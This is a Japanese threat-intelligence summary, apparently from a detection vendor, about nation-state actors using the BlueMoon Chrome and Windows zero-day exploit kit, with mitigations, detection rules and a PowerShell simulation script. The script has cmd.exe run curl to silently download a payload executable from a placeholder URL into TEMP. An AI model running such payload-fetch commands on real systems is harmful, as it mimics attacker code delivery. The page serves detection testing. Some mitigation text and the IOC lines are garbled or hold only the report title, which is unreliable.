ChromeとWindowsのゼロデイが国家系脅威アクターによって迅速に採用
Detection stack
- AIDR
- Alert
- ETL
- Query
概要
複数のスパイ活動を目的とする脅威アクターが、Chrome V8の脆弱性とWindowsカーネルのLPEゼロデイを連携させたBlueMoonエクスプロイトキットを採用しています。このキャンペーンは急速なオペレーショナルアダプションを示しており、AI支援によるエクスプロイト開発を含む可能性があります。主に中国との関係が疑われる複数のアクターが、このキットを使用して、悪意のあるブラウザ拡張機能やバックドアなど、さまざまなペイロードを配信しています。
調査
Proofpointは、BlueMoonキットを使用する4つの異なる脅威クラスターを特定し、パッケージングの違いにもかかわらず、類似したオーケストレーションおよびローディング手法を観察しました。調査では、パッチギャップの脆弱性の悪用とDLLサイドローディングや悪意のあるブラウザ拡張機能のインストールなどのポストエクスプロイト行動が強調されました。技術分析では、AI支援の開発を示唆する可能性のある広範な診断ロギングとマークダウンハンドオーバーファイルが明らかになりました。
緩和策
ユーザーは、V8の脆弱性に対処するため、Chromeおよび他のChromiumベースのブラウザを最新の安定版に更新する必要があります。組織はまた、カーネルLPEの欠陥に対する露出を減らすため、Windowsのパッチ適用を優先すべきです。 chrome.exe を含む疑わしいプロセスツリーの監視や、 cmd.exe or 、、
、および不審な名前のスケジュールタスクの監査が推奨されます。
BlueMoonのエクスプロイトが検出された場合、影響を受けたエンドポイントを直ちに隔離して、さらなる横方向の移動やデータの流出を防ぐ必要があります。レスポンダーは、メモリフォレンジクスを実行してリフレクティブにロードされたDLLを特定し、許可されていないブラウザ拡張機能のシステムを検査するべきです。セキュリティチームはまた、特に不審なスケジュールタスクやCLSIDハイブ内のレジストリ変更を対象に、永続性メカニズムを調査するべきです。
攻撃フロー
この部分はまだ更新中です。
検出
疑わしいCURLの使用(cmdline経由)
公共ユーザープロファイル内の疑わしいファイル(file_event経由)
Cloudflare開発ドメインの不正利用の可能性(dns経由)
IPルックアップドメイン通信の試行(dns経由)
不審なトップレベルドメイン(TLD)DNS要求による指揮統制の試み(dns経由)
検出するためのIOCs(HashSha256):Once in a BlueMoon:複数の国家連携型脅威アクターがChromeおよびWindowsゼロデイを使用して新規エクスプロイトチェーンを迅速に採択
検出するためのIOCs(SourceIP):Once in a BlueMoon:複数の国家連携型脅威アクターがChromeおよびWindowsゼロデイを使用して新規エクスプロイトチェーンを迅速に採択
検出するためのIOCs(DestinationIP):Once in a BlueMoon:複数の国家連携型脅威アクターがChromeおよびWindowsゼロデイを使用して新規エクスプロイトチェーンを迅速に採択
ChromからCMDとCURLの実行によるBlueMoonエクスプロイトチェーンの検出 [Windowsプロセス作成]
シミュレーション実行
-
攻撃のシナリオとコマンド: 敵対者はウェブを閲覧するユーザーを標的にします。Chromeの脆弱性を利用することで、攻撃者はブラウザーにコマンドシェルを生成させます。フットプリントを最小化し、ブラウザを通じて大きなファイルを直接ダウンロードするのを避けるために、攻撃者は
cmd.exeを呼び出すためにcurlを使用します。コマンドは特に、-sS -oフラグを使用して、msgbox.exeという名前のペイロードをリモートサーバーからサイレントにダウンロードし、BlueMoonのエクスプロイトの動作をシミュレーションします。 -
リグレッションテストスクリプト:
# BlueMoonエクスプロイトチェーンのシミュレーション # ステップ 1: Chrome を親プロセスとしてシミュレーションします(必要に応じて PowerShell ラッパーを使って PID/プロセスツリーをシミュレーションしますが、 # 直接のテストとして、コマンドラインパターンをトリガーします)。 $SimulatedPayloadUrl = "https://raw.githubusercontent.com/example/payload/main/msgbox.exe" $TargetDir = "$env:TEMPmsgbox.exe" Write-Host "[!] BlueMoonシミュレーションを開始しています..." # 検出がトリガーされるように、Sigmaルールで定義された通りにコマンドラインを正確に模倣しなければなりません。 # 注意: 実際の環境では、chrome.exeは親になります。 # このスクリプトでは、ルールが探しているコマンドを実行します。 Start-Process "cmd.exe" -ArgumentList "/c curl -sS -o $TargetDir $SimulatedPayloadUrl" -Wait Write-Host "[+] シミュレーションが完了しました。SIEMで検出を確認してください。" -
クリーンアップコマンド:
# シミュレーションされたペイロードを削除します Remove-Item -Path "$env:TEMPmsgbox.exe" -ErrorAction SilentlyContinue Write-Host "[+] クリーンアップ完了。"